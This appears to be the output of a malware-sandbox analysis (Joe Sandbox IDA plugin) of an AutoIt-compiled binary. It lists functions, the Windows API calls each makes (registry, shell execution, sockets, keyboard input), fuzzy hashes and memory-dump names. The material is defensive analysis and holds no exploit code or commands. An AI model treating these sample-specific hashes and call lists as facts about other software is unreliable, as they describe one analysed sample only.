                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 3648134473-3128320259
                                                                                • Opcode ID: e4d4c7f76a1fd6d91f0872501ed12b067b172c710233af59865ebcbd69f5d6b9
                                                                                • Instruction ID: 7e112895b854d0434fda04f98f839ad56736e630c6b656b9ff750878cc3542d2
                                                                                • Opcode Fuzzy Hash: e4d4c7f76a1fd6d91f0872501ed12b067b172c710233af59865ebcbd69f5d6b9
                                                                                • Instruction Fuzzy Hash: 5A0131F6900208BFEB21ABA4DD89EF7776CD709304F4084A1B747E2451EA789E848F75
                                                                                APIs
                                                                                  • Part of subcall function 00783C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00782BB5,?,?), ref: 00783C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00782BF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 2595220575-0
                                                                                • Opcode ID: 4f151ffac5df2ad66526ee908e3cfddfabd70a11805607ca049a267972b1037c
                                                                                • Instruction ID: d5ebdc9a3fb88db61c38c150f20ea52fb6a6c7ce63276a73891c1fb541d19845
                                                                                • Opcode Fuzzy Hash: 4f151ffac5df2ad66526ee908e3cfddfabd70a11805607ca049a267972b1037c
                                                                                • Instruction Fuzzy Hash: F6915B71204201DFCB15EF54C899B6EBBE5BF98310F04881DF99697292DB38ED06CB52
                                                                                APIs
                                                                                • select.WSOCK32 ref: 00779691
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0077969E
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?), ref: 007796C8
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007796E9
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007796F8
                                                                                • htons.WSOCK32(?), ref: 007797AA
                                                                                • inet_ntoa.WSOCK32(?), ref: 00779765
                                                                                  • Part of subcall function 0075D2FF: _strlen.LIBCMT ref: 0075D309
                                                                                • _strlen.LIBCMT ref: 00779800
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 3480843537-0
                                                                                • Opcode ID: c50b5b517394b949425c102a5f63c02cd00af69effe2ff79b9795b112a786bfc
                                                                                • Instruction ID: 2c28c1fc8df1b786b88066c0789548843cfe27c2c4be20bc7e45e4fcc7e9cb94
                                                                                • Opcode Fuzzy Hash: c50b5b517394b949425c102a5f63c02cd00af69effe2ff79b9795b112a786bfc
                                                                                • Instruction Fuzzy Hash: F881E171504240EBD724EF64DC89E6BB7E8EF85710F10861DF55A9B292EB38DD04CB92
                                                                                APIs
                                                                                • __mtinitlocknum.LIBCMT ref: 0074A991
                                                                                  • Part of subcall function 00747D7C: __FF_MSGBANNER.LIBCMT ref: 00747D91
                                                                                  • Part of subcall function 00747D7C: __NMSG_WRITE.LIBCMT ref: 00747D98
                                                                                  • Part of subcall function 00747D7C: __malloc_crt.LIBCMT ref: 00747DB8
                                                                                • __lock.LIBCMT ref: 0074A9A4
                                                                                • __lock.LIBCMT ref: 0074A9F0
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,007D6DE0,00000018,00755E7B,?,00000000,00000109), ref: 0074AA0C
                                                                                • EnterCriticalSection.KERNEL32(8000000C,007D6DE0,00000018,00755E7B,?,00000000,00000109), ref: 0074AA29
                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 0074AA39
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1422805418-0
                                                                                • Opcode ID: 31e4430d4986ce5bde79f636a41ea4f034d26f11a7a907323fe85e1f54207490
                                                                                • Instruction ID: 691f17e47ddb9ed3b3f838c412bf88fb370b87a10fb5aef588662235543ad833
                                                                                • Opcode Fuzzy Hash: 31e4430d4986ce5bde79f636a41ea4f034d26f11a7a907323fe85e1f54207490
                                                                                • Instruction Fuzzy Hash: D3412871B41202EBEB14DF68D98475CB7B0AF05325F10C219E425AB2D2DBBC9C40CB96
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00788EE4
                                                                                • GetDC.USER32(00000000), ref: 00788EEC
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00788EF7
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00788F03
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00788F3F
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00788F50
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0078BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00788F8A
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00788FAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 2f61971bbf70d7b81fe014a57d76ed59560ba9bf33ffe601049ddd52178830be
                                                                                • Instruction ID: cce2f7a825bf39b56c682652a4fcc4856fb515f70bb974ba513a9e4703e620c6
                                                                                • Opcode Fuzzy Hash: 2f61971bbf70d7b81fe014a57d76ed59560ba9bf33ffe601049ddd52178830be
                                                                                • Instruction Fuzzy Hash: 45316D72240214BFEB209F50CC49FEB3BA9EF8A755F048065FE099A191DA799C41CB74
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0079016D
                                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0079038D
                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007903AB
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 007903D6
                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007903FF
                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00790421
                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00790440
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                • String ID:
                                                                                • API String ID: 3356174886-0
                                                                                • Opcode ID: 711ee1827b50adac7da1e1e7510d045faa0b32d2b32fd09adcb3477f198178af
                                                                                • Instruction ID: d243611d37abe9d269011c8c670f2bb5b27e508dd4a3b10b12a24cc9e50de338
                                                                                • Opcode Fuzzy Hash: 711ee1827b50adac7da1e1e7510d045faa0b32d2b32fd09adcb3477f198178af
                                                                                • Instruction Fuzzy Hash: 85A1AD35600616EFDF18CF68D9897BDBBB1BF48740F048119ED55AB290DB38AD60CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46220d7644419a71e83e96c08a81cbc13dd77bd7c54fbbf65857915233736a13
                                                                                • Instruction ID: 91151b0b2903c111d1a70bf59d4450c94f67fc7c335d1509f75b61835c0a31a1
                                                                                • Opcode Fuzzy Hash: 46220d7644419a71e83e96c08a81cbc13dd77bd7c54fbbf65857915233736a13
                                                                                • Instruction Fuzzy Hash: 16716BB190010AFFDF14CF98CC89AAEBB78FF85310F148159F955A6252C738EA41CB65
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0078225A
                                                                                • _memset.LIBCMT ref: 00782323
                                                                                • ShellExecuteExW.SHELL32(?), ref: 00782368
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                  • Part of subcall function 0073C6F4: _wcscpy.LIBCMT ref: 0073C717
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0078242F
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0078243E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                • String ID: @
                                                                                • API String ID: 4082843840-2766056989
                                                                                • Opcode ID: a7846c37a5265c85ea488c9dbc38b8daffb6c9cd643e2e320dabc14f5006e7d3
                                                                                • Instruction ID: 29ebd7df4f128352910685611a71840a75f504231fd03cb411569046b8172567
                                                                                • Opcode Fuzzy Hash: a7846c37a5265c85ea488c9dbc38b8daffb6c9cd643e2e320dabc14f5006e7d3
                                                                                • Instruction Fuzzy Hash: 29719F70A00629DFCF05EFA4D8959AEB7F5FF48310F118059E85AAB352CB38AD41CB94
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 00763DE7
                                                                                • GetKeyboardState.USER32(?), ref: 00763DFC
                                                                                • SetKeyboardState.USER32(?), ref: 00763E5D
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00763E8B
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00763EAA
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00763EF0
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00763F13
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: ad8aeb29aa74d82a3ee36789b6fa7bee2c790ba07fddcb5c1167a47e2e42fd69
                                                                                • Instruction ID: c3af9e872648d7c372faefe660f90c1ed6b6c55767b06d4d9e9aa21893917ba3
                                                                                • Opcode Fuzzy Hash: ad8aeb29aa74d82a3ee36789b6fa7bee2c790ba07fddcb5c1167a47e2e42fd69
                                                                                • Instruction Fuzzy Hash: B051B1A0A047D53DFB364734CC59BBA7EA95B06304F088589F8D6568C3D3ADAEC8D760
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 00763C02
                                                                                • GetKeyboardState.USER32(?), ref: 00763C17
                                                                                • SetKeyboardState.USER32(?), ref: 00763C78
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00763CA4
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00763CC1
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00763D05
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00763D26
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: 9d92caf115eaaaf014d584bc6482d5cfffa81f7bd0130c214da6b9d309443382
                                                                                • Instruction ID: 17c68a853f4bb4295e5b1afd298ba0e8e87084f6268518d3d248a8a4b11ce372
                                                                                • Opcode Fuzzy Hash: 9d92caf115eaaaf014d584bc6482d5cfffa81f7bd0130c214da6b9d309443382
                                                                                • Instruction Fuzzy Hash: AC51E8A06047D53DFB3687248C55BB6BFA95B06300F0C8489F9D75A8C2D79CEE94D760
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsncpy$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 2945705084-0
                                                                                • Opcode ID: 138dc5511cd7e9e937c4e8a14869e23b5f5ddab4de5829aa7e98d0fa0b94dd33
                                                                                • Instruction ID: 62e022b96815cd613a3ef1619028bac5829799401a4c25cca2217f5d1f986c92
                                                                                • Opcode Fuzzy Hash: 138dc5511cd7e9e937c4e8a14869e23b5f5ddab4de5829aa7e98d0fa0b94dd33
                                                                                • Instruction Fuzzy Hash: A2416066C10214F6CB50EBF4888A9CFB3AC9F45710F5089A6E915E3122FB38E655C7A6
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00783DA1
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00783DCB
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00783E80
                                                                                  • Part of subcall function 00783D72: RegCloseKey.ADVAPI32(?), ref: 00783DE8
                                                                                  • Part of subcall function 00783D72: FreeLibrary.KERNEL32(?), ref: 00783E3A
                                                                                  • Part of subcall function 00783D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00783E5D
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00783E25
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                • Opcode ID: 44d9e99410ab95a5b903f4cda4664f8750319248296c6fd13f833db211c6449f
                                                                                • Instruction ID: c88aa9693d82125907a73de038c62038d2948c12c793565813fedee7dd452d2c
                                                                                • Opcode Fuzzy Hash: 44d9e99410ab95a5b903f4cda4664f8750319248296c6fd13f833db211c6449f
                                                                                • Instruction Fuzzy Hash: 12311AB1941109BFDB15AF94DC89EFFB7BCEF09701F00416AE512E2150E6789F899BA0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00788FE7
                                                                                • GetWindowLongW.USER32(00D7E868,000000F0), ref: 0078901A
                                                                                • GetWindowLongW.USER32(00D7E868,000000F0), ref: 0078904F
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00789081
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007890AB
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007890BC
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007890D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 6a73eb44942d85c4655aff627b8cf9b1a1fd1f7691b760ccf614e6ac1c31875f
                                                                                • Instruction ID: cedbabbff401a9b56ac1902190b9d93827a5842764ad73e30d7213795b28fa9e
                                                                                • Opcode Fuzzy Hash: 6a73eb44942d85c4655aff627b8cf9b1a1fd1f7691b760ccf614e6ac1c31875f
                                                                                • Instruction Fuzzy Hash: 8D316734280216EFDB21DF58DC89F6437A5FB8A354F1881A4F60A8F2B1CB79AC00CB45
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007608F2
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00760918
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0076091B
                                                                                • SysAllocString.OLEAUT32(?), ref: 00760939
                                                                                • SysFreeString.OLEAUT32(?), ref: 00760942
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00760967
                                                                                • SysAllocString.OLEAUT32(?), ref: 00760975
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: eefc1d8c7a2050486290a4a3f3357cf021e16233e317bf99be93c50ba7bb9325
                                                                                • Instruction ID: 628ed8891e001f91a33467d55811557c4410b4099354c1354437ef42fe14c64e
                                                                                • Opcode Fuzzy Hash: eefc1d8c7a2050486290a4a3f3357cf021e16233e317bf99be93c50ba7bb9325
                                                                                • Instruction Fuzzy Hash: 0B21A776601319AFAB109F78CC88DBB73ACEB09360B008125FD16DB251D678EC45CBA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 1038674560-2734436370
                                                                                • Opcode ID: 52e64457a372b60315da13398cd25553db0c3e12ed349ee603217118b68d4c94
                                                                                • Instruction ID: 5b3fa52193004dcadd49606288927e02c605c03fef8d23361fe39fffda6b4cf1
                                                                                • Opcode Fuzzy Hash: 52e64457a372b60315da13398cd25553db0c3e12ed349ee603217118b68d4c94
                                                                                • Instruction Fuzzy Hash: 0B216A72244A51E7D231A6349C1AFBB7798EF65310F604026FC4797043EB5D9D53C3A5
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007609CB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007609F1
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 007609F4
                                                                                • SysAllocString.OLEAUT32 ref: 00760A15
                                                                                • SysFreeString.OLEAUT32 ref: 00760A1E
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00760A38
                                                                                • SysAllocString.OLEAUT32(?), ref: 00760A46
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
